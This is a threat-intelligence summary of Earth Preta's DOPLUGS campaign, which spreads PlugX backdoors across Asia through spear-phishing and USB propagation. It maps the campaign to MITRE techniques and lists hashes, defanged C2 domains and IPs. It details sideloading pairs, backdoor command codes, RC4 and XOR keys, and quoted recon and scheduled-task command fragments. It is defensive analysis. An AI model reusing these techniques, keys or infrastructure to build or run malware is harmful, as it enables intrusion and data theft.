Earth Preta Campaign Uses DOPLUGS to Target Asia

Trend Micro analyzes an Earth Preta campaign using a customized PlugX downloader named DOPLUGS to deliver general PlugX backdoors across Asia via spear-phishing and USB-based propagation. The campaign includes a KillSomeOne USB-worm module, MSI-based droppers, DLL sideloading, RC4-encrypted C2 traffic, and distinct backdoor commands for downloading payloads and removing persistence. #EarthPreta #DOPLUGS

Keypoints

DOPLUGS is a custom PlugX downloader used by Earth Preta to fetch general PlugX payloads and implement limited backdoor commands rather than a full PlugX feature set.
Initial access commonly uses spear‑phishing emails pointing to Google Drive-hosted, password-protected RAR archives that contain LNK shortcuts which invoke PowerShell to download an MSI.
The MSI droppers (e.g., 6460c7.msi) extract a legitimate executable (OneNotem.exe), a malicious DLL (msi.dll), and an encrypted payload (NoteLogger.dat) and use DLL sideloading for execution and persistence.
DOPLUGS implements a small backdoor set (examples: 0x7002 to spawn a CMD shell, 0x3004 to download DLL/EXE/DAT payloads, 0x1007 to adjust network timeouts, and 0x1005 to remove persistence) and uses RC4 with a variable key for C2 packet encryption.
The general PlugX variants delivered by DOPLUGS perform DLL loader sideloading using legitimate EXEs (e.g., adobe_licensing_wf_helper.exe, Avastsz.exe), inject into system processes (WerFault/svchost), and store encrypted configurations (type‑dependent RC4 keys like qwedfgx202211).
A DOPLUGS variant integrates the KillSomeOne module, enabling USB worm behavior: copying disguised files to removable media, executing a launcher that sideloads a Go-compiled loader, stealing documents and system info, clearing prior PlugX traces, and scheduling tasks to enable Wi‑Fi.

MITRE Techniques

[T1583.004] Acquire Infrastructure: Server – Earth Preta used hosted servers and domains for distribution and C2 (‘https://getfiledown[.]com/vgbskgyu’ and various C2 domains listed).
[T1587.001] Develop Capabilities: Malware – The actor developed and customized downloader/backdoor tooling (DOPLUGS) derived from PlugX (‘we decided to give this piece of customized PlugX malware a new name: DOPLUGS’).
[T1585.002] Establish Accounts: Email Accounts – Attack timeline and spear-phishing implies attacker-controlled accounts used for targeting (‘spear-phishing emails sent to victims’).
[T1588.002] Obtain Capabilities: Tool – Use of legitimate utilities and sideloading binaries (Adobe/Avast executables) to enable malware execution (‘legitimate executable for sideloading’).
[T1608.001] Stage Capabilities: Upload Malware – Actors staged archives and MSI/EXE/DLL components on public hosting for victim download (‘Google Drive link that hosts a password-protected archive file, which will download DOPLUGS malware’).
[T1608.005] Link Target – Use of targeted decoy content (election, local projects) to link to victims (‘the files used for social engineering were related to current events… the Taiwanese presidential election’).
[T1566.002] Phishing: Spearphishing Link – Initial access via emails containing Google Drive links to passworded RARs and LNK shortcuts (‘spear-phishing emails sent to victims are embedded with a Google Drive link that hosts a password-protected archive file’).
[T1090] Replication Through Removable Media – KillSomeOne enables USB propagation by copying malicious components to removable drives (‘KillSomeOne module … specializes in USB infections’).
[T1204.002] User Execution: Malicious File – Victims execute LNK or disguised USB launcher files, causing MSI download and execution (‘When the victim selects the LNK file, a MSI file will be downloaded’).
[T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – PlugX and DOPLUGS set registry Run keys and services for persistence (‘Creates registry SoftwareMicrosoftWindowsCurrentVersionRun with name “Adobe Licensing Helper”‘).
[T1574.002] Hijack Execution Flow: DLL Side-Loading – Loaders sideload malicious DLLs via legitimate EXEs (e.g., adobe_licensing_wf_helper.exe + libcef.dll) to run PlugX payloads (‘malicious loader’ and ‘legitimate executable for sideloading’).
[T1053.005] Scheduled Task/Job: Scheduled Task – Malware creates scheduled tasks to enable Wi‑Fi and maintain connectivity (‘schtasks.exe /create … “Security WIFI Script”‘).
[T1140] Deobfuscate/Decode Files or Information – Components decrypt encrypted payloads/configs (XOR and RC4 used) before execution (‘It decrypts the encrypted payload by XOR with the single key, 0x73’ and ‘RC4 algorithm, which is 0x20 bytes retrieved from the C&C server’).
[T1036.005] Masquerading: Match Legitimate Name or Location – Malware uses legitimate-sounding filenames and copy locations to blend in (e.g., “Adobe Licensing Helper”, fake USB disk names) (‘The launcher pretends to be a fake USB disk to lure victims’).
[T1070.009] Indicator Removal: Clear Persistence – KillSomeOne removes traces of previous PlugX infestations by deleting files, registry keys, processes, and scheduled tasks (‘removes all traces related to previous pieces of PlugX malware’).
[T1564.001] Hidden Files and Directories – The worm hides malware and stolen documents and toggles Explorer settings to hide extensions and files (‘these registries are enabled to hide the file extension and the folders that contain malware and stolen documents’).
[T1056.001] Input Capture: Keylogging – PlugX configuration includes keylogger file-extension targets for theft (‘File extensions that are read by the keylogger: *.doc*, *.pdf, *.xls, *.ppt*’).
[T1083] File and Directory Discovery – Malware enumerates directories and files to collect documents from USB and local folders (‘checks the file extensions in these predefined folders’).
[T1016.001] Internet Connection Discovery – Threads check connectivity (e.g., attempt to reach https://www.microsoft.com/) to decide collection behavior (‘If the connection succeeds in connecting to https://www.microsoft.com/’).
[T1049] System Network Connections Discovery – Malware runs netstat and collects network info as part of victim data collection (‘%comspec% /q /c netstat -ano >> …’).
[T1082] System Information Discovery – Systeminfo and other commands are executed to gather host details (‘systeminfo > “%~dp0AE353BBEB1C6603E_E.dat”‘).
[T1012] Query Registry – Malware reads/writes registry values (e.g., NetworkVersion) to alter behavior and persistence (‘checks the value in registry (HKCU|HKLM)SystemCurrentControlSetControlNetworkVersion’).
[T1005] Data from Local System – The collection thread copies local document files into staging folders for exfiltration (‘it will transfer the file to %userprofile%AppDataRoamingRender1.0’).
[T1025] Data from Removable Media – The USB-stealing module harvests files from removable media and encrypts them for exfiltration (‘it will transfer the file to %userprofile%AppDataRoamingRender1.0 and empty the content of the original file’).
[T1071.001] Application Layer Protocol: Web Protocols – C2 communications and file downloads use HTTPS and web ports for staging and PlugX C2 (‘electrictulsa[.]com:443’ and web-based C2 domains listed).
[T1573] Encrypted Channel – C2 traffic and payloads are encrypted; RC4 is used for packet encryption and other encrypted channels are present (‘it will be encrypted or decrypted with the RC4 algorithm’).

Indicators of Compromise

[File hashes] Dropper and payload examples – 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321 (6460c7.msi), f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5 (msi.dll), and 15+ other hashes from the report.
[Domains] Distribution and C2 – getfiledown[.]com (MSI download via LNK), web.bonuscave[.]com / www.markplay[.]net (PlugX C2), and other hosting domains such as electrictulsa[.]com.
[IP addresses] C2 and staging hosts – 149[.]104[.]12[.]64:443 (used to host payloads), 45[.]83[.]236[.]105:443 (C2), and several other IPv4 C2/staging IPs listed.
[File names] Decoys and components – decoy PDFs like 水源路二至五期整建住宅都市更新推動說明.pdf and Үер усны сэрэмжлүүлэг.pdf; dropped components OneNotem.exe, msi.dll, NoteLogger.dat, and MSI names like 6460c7.msi.

Earth Preta’s technical infection chain centers on weaponized LNK shortcuts wrapped in password‑protected RARs hosted via Google Drive. When a user opens the LNK, it runs PowerShell to call Windows Installer and fetch an MSI (e.g., from getfiledown[.]com); the MSI unpacks a legitimate executable, a malicious DLL, and an encrypted DAT payload (commonly OneNotem.exe, msi.dll, NoteLogger.dat) and uses DLL sideloading to execute the malicious loader and establish persistence via Run keys or services.

DOPLUGS itself is a lightweight downloader/backdoor: it supports RC4-encrypted C2 traffic using a variable key, and exposes a small command set (examples include 0x7002 to spawn a CMD shell, 0x3004 to download next-stage PlugX DLL/EXE/DAT, 0x1007 to set WinHTTP timeout/sleep values, and 0x1005 to remove persistence). The downloader retrieves one of two general PlugX types which perform DLL sideloading (adobe_licensing_wf_helper.exe + libcef.dll or Avastsz.exe + SZBrowser.dll), inject into system processes (WerFault.exe or svchost.exe), and use RC4/decryption keys (e.g., qwedfgx202211) for encrypted configurations and C2 lists.

Variants integrated the KillSomeOne USB module to expand infection vectors: a Go-compiled loader decrypts a payload with XOR(0x73), installs files into hidden folders on removable media, creates fake USB‑styled launchers to trick users, exfiltrates documents via XOR-based file encryption, removes traces of prior PlugX instances, and can create scheduled tasks to enable Wi‑Fi. Detection and response should focus on monitoring LNK/PowerShell installer activity, unusual MSI downloads, DLL sideloading from Adobe/Avast binaries, RC4-encrypted outbound traffic, and USB autorun‑style file copying patterns.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print